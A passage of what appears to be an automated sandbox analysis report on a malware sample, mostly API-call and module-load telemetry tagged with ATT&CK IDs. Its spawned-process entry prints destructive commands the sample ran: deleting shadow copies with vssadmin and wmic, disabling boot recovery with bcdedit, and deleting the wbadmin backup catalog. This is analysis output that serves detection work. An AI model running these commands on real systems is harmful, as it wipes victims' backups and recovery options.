%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005776)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005968)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005968)\n \"vssadmin.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004144)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00003480)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003480)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003184)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003184)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003184)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003184)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003720)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll\" - [base:0; Status:c0000135]\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WMIC.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WMIC.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"wbadmin.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"wbadmin.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76050000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76050000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76050000\n \"vssadmin.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76050000\n \"WMIC.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76050000\n \"bcdedit.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76050000\n \"wbadmin.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76050000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64820000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64FD0000\n \"svchost.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64FD0000\n \"svchost.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64820000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"svchost.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"svchost.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"svchost.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"svchost.exe\" (UID: 00000000-00005968)\n Spawned process \"cmd.exe\" with commandline \"/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete\" (UID: 00000000-00000244)\n Spawned process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00004144)\n Spawned process \"WMIC.exe\" with commandline \"wmic shadowcopy delete\" (UID: 00000000-00003480)\n Spawned process \"cmd.exe\" with commandline \"/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & b ...\" (UID: 00000000-00003944)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} bootstatuspolicy ignoreallfailures\" (UID: 00000000-00001216)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} recoveryenabled no\" (UID: 00000000-00004368)\n Spawned process \"cmd.exe\" with commandline \"/C wbadmin delete catalog -quiet\" (UID: 00000000-00003184)\n Spawned process \"wbadmin.exe\" with commandline \"wbadmin delete catalog -quiet\" (UID: 00000000-00003720)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetUserName (UID: 00000000-00005776)\n 